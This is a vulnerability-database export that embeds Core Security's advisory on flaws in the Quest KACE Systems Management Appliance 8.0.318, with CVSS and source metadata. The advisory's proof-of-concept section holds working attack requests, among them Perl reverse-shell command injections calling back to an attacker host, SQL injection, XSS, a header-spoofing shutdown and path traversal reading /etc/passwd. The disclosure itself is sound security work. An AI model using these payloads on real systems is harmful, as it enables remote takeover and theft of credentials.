"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://support.quest.com/kb/288310/cert-coordination-center-report-update"
},
{
"trust": 3.0,
"url": "https://www.kb.cert.org/vuls/id/877837/"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5404"
},
{
"trust": 1.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5404"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5405"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5406"
},
{
"trust": 0.8,
"url": "https://support.quest.com/kace-systems-management-appliance/9.1/download-new-releaseshttps://support.quest.com/https://support.quest.com/kb/288310/cert-coordination-center-report-update"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu91210160/index.html"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-01T00:00:00",
"db": "CERT/CC",
"id": "VU#877837"
},
{
"date": "2019-07-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"date": "2019-06-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"date": "2019-06-03T19:29:01.593000",
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"date": "2019-06-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-03T00:00:00",
"db": "CERT/CC",
"id": "VU#877837"
},
{
"date": "2019-07-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"date": "2019-06-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"date": "2019-10-09T23:41:18.487000",
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"date": "2019-06-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest Software Kace K1000 Appliance SQL Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
],
"trust": 0.6
}
}
VAR-201805-0593
Vulnerability from variot - Updated: 2023-12-18 12:01 — The 'fmt' parameter of the '/common/run_cross_report.php' script in the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting. Quest KACE System Management Appliance is an IT asset management device from Quest Software, USA. A remote attacker can exploit this vulnerability to inject arbitrary web scripts or HTML. Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
- Quest KACE System Management Appliance 8.0.318
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
- platform: Indicates the platform in which the agent is going to be installed - serv: SHA256 hash of a fixed value that depends of each appliance - orgid: Organization ID - version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the 'ERROR_MESSAGES' parameter needs to be an array that meets some specific conditions.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that require higher privileges, the application relies on a message queue manager that runs with root privileges and only allows a set of commands to be executed.
One of the available commands allows changing any user's password (including root).
Assuming we are able to run commands on the server, we could abuse this feature by changing the password of the 'kace_support' account, which is disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] The 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X-Forwarded-For' HTTP headers.
The following proof of concept abuses this vulnerability to shut down the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection; specifically, a blind, time-based injection.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportID' parameter received by the '/common/run_report.php' script is not sanitized, leading to SQL injection; specifically, an error-based injection.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Cross-site scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete the '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence determines whether the appliance setup wizard is shown.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4, we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core for its reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM stated that the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise Quest would take legal action.
2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. 
With regards to Quest's requests, Core provided the researchers' names and the URL the advisory will have when published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked for the right contact at Quest), but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0593",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11133"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11133",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-11133",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-15640",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
